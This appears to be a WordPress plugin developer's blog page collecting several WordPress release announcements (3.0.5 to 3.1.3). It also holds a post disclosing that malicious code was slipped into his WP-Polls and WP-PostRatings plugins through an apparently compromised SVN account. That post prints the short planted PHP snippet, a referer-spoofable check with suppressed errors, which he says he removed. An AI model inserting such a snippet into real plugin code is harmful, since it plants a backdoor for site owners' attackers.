Category: WordPress

WordPress 3.1.3

WordPress 3.1.3 has been released and it contains security fixes and enhancements.

  • Various security hardening by Alexander Concha.
  • Taxonomy query hardening by John Lamansky.
  • Prevent sniffing out user names of non-authors by using canonical redirects. Props Verónica Valeros.
  • Media security fixes by Richard Lundeen of Microsoft, Jesse Ou of Microsoft, and Microsoft Vulnerability Research.
  • Improves file upload security on hosts with dangerous security settings.
  • Cleans up old WordPress import files if the import does not finish.
  • Introduce “clickjacking” protection in modern browsers on admin and login pages.

Changelog: WordPress 3.1.3
Download: WordPress 3.1.3
Download: Modified files since WordPress 3.1.2

1 Star2 Stars3 Stars4 Stars5 Stars (158 votes, average: 3.96 out of 5)

WordPress 3.1.2

WordPress 3.1.2 has been released and is a security release for all previous WordPress versions.

This release addresses a vulnerability that allowed Contributor-level users to improperly publish posts.

We suggest you update to 3.1.2 promptly, especially if you allow users to register as contributors or if you have untrusted users. This release also fixes a few bugs that missed the boat for version 3.1.1.

Changelog: WordPress 3.1.2
Download: WordPress 3.1.2
Download: Modified files since WordPress 3.1.1

1 Star2 Stars3 Stars4 Stars5 Stars (41 votes, average: 4.02 out of 5)

WordPress 3.1

WordPress 3.1 is finally out! With regards to my plugins compatibility with WordPress 3.1, I have not had the chance to test it it. I will be doing it soon =)

The long-awaited fourteenth release of WordPress is now available. WordPress 3.1 “Django” is named in honor of the jazz guitarist Django Reinhardt. Version 3.1 is available for download, or you can update from within your dashboard.

This release features a lightning fast redesigned linking workflow which makes it easy to link to your existing posts and pages, an admin bar so you’re never more than a click away from your most-used dashboard pages, a streamlined writing interface that hides many of the seldom-used panels by default to create a simpler and less intimidating writing experience for new bloggers (visit Screen Options in the top right to get old panels back), and a refreshed blue admin scheme available for selection under your personal options.

There’s a bucket of candy for developers as well, including our new Post Formats support which makes it easy for themes to create portable tumblelogs with different styling for different types of posts, new CMS capabilities like archive pages for custom content types, a new Network Admin, an overhaul of the import and export system, and the ability to perform advanced taxonomy and custom fields queries.

With the 3.1 release, WordPress is more of a CMS than ever before. The only limit to what you can build is your imagination.

(No video yet for 3.1, we’re going to add it later.)

By the Numbers

There were over two thousand commits to the codebase in the 3.1 cycle! For a more comprehensive look at everything that has improved in 3.1, check out 3.1’s Codex page or the more than 820 closed issues in Trac.

Now is the time to drop by our development channels if you are interested in being involved with 3.2, as the agenda will be under discussion shortly. We’re hoping to get the 3.2 release out in a shorter development cycle (3.1 took too long) and include some fun improvements around plugins and the speed of the admin. (Don’t worry, we’re still planning on using PHP.)

We’re All in This Together

WordPress is the result of the combined effort of people from all over the world united with a common goal: to make the best darn web software for publishing your story on the web and sharing it with the world. There are more than 180 people who helped out with development during the 3.1 cycle

Download: WordPress 3.1

1 Star2 Stars3 Stars4 Stars5 Stars (332 votes, average: 3.95 out of 5)

Code Injection Follow Up

I have release 2 security updates to WP-Polls and WP-PostRatings which basically removes a malicious code that allows code injection.

The malicious code is as follows:

if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER']))
return;

The code itself does nothing, but hackers are spoofing the $_SERVER['HTTP_REFERER'] that allows arbitrary code injection and note the @ sign which surpress all errors and hence the error will not be displayed.

I am 100% sure based on the points below that the code was not added by me. I am beginning to believe that my account was hacked.

  • Personally, I have no idea what links_add_base_url() does and hence it is impossible for me to place it in my own plugin code.
  • I checked the commit date for the changeset of WP-PostRatings and the date/time is 11/04/10 22:10:13. Since I am on the GMT+8 zone, it is 6am for me. I do not wake up at 6am just to update my plugin.
  • The above changeset is for trunk. However in my readme.txt, I have state that the stable tag is 1.50 and hence the file is copied to /tags/1.50/ in this changeset, but if you note the time, it is 11/05/10 00:52:39. This is almost 3 hours after the trunk commit and it is almost 9am on my timezone and I will be in my office and my office’s computer does not have SVN copies of my plugin. So it is also not possible for me to commit that file
  • If you notice the same changeset, the file is being copied from trunk to tags/1.50 by SVN copy. I do not do a SVN copy for my plugins, normally I will just copy and paste the files using my Windows Explorer.
  • For WP-Polls, there is only 1 changeset as my stable tag is from trunk and the timestamp is 11/05/10 12:30:07. This is about 12 hours after the changeset of WP-PostRatings. On my timezone it is about 8.30pm and it is not possible for me to check-in because 8pm to 9pm is my dinner time and I always eat out.
  • For WP-WAP, there is almost 2 suspicious commit, here and here. As I do not develop WP-Wap anymore, there is no reason for me to commit something to it

I am going to review all my commits to the SVN to ensure that there are no more suspicious code being added.

1 Star2 Stars3 Stars4 Stars5 Stars (87 votes, average: 3.93 out of 5)

WordPress 3.0.5 & 3.1 RC4

WordPress 3.0.5 & 3.1 RC4 has been released:

WordPress 3.0.5

WordPress 3.0.5 is now available and is a security hardening update for all previous WordPress versions.

This security release is required if you have any untrusted user accounts, but it also comes with important security enhancements and hardening. All WordPress users are strongly encouraged to update.

Three point oh point five

Enhances security

Three point one comes soon

The release addresses a number of issues and provides two additional enhancements:

Two moderate security issues were fixed that could have allowed a Contributor- or Author-level user to gain further access to the site.

One information disclosure issue was addressed that could have allowed an Author-level user to view contents of posts they should not be able to see, such as draft or private posts.

Two security enhancements were added. One improved the security of any plugins which were not properly leveraging our security API. The other offers additional defense in depth against a vulnerability that was fixed in previous release.

Thanks to Nils Jueneman and Saddy for their private and responsible disclosures to security@wordpress.org for two of the issues. The others were reported or repaired by our security team.

Changelog: WordPress 3.0.5
Download: WordPress 3.0.5
Download: Modified files since WordPress 3.0.4

WordPress 3.1 RC4

The Release Candidate 4 build includes the security fixes and enhancements included in 3.0.5 and addresses about two dozen additional bugs. This includes fixes for:

  • Deleting a user and reassigning their posts to another user.
  • Marking multiple users or sites as spam in multisite.
  • PHP4 compatibility.

As outlined in previous RC posts, if you are testing the release candidate and think you’ve found a bug, there are a few ways to let us know:

To test WordPress 3.1, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the release candidate here (zip). If any new issues become known, you’ll be able to find them here.

After nearly five months of development and testing, we think we’re very close to a final release. Users and developers, please test your themes and plugins.

Download: WordPress 3.1 RC4

1 Star2 Stars3 Stars4 Stars5 Stars (92 votes, average: 3.92 out of 5)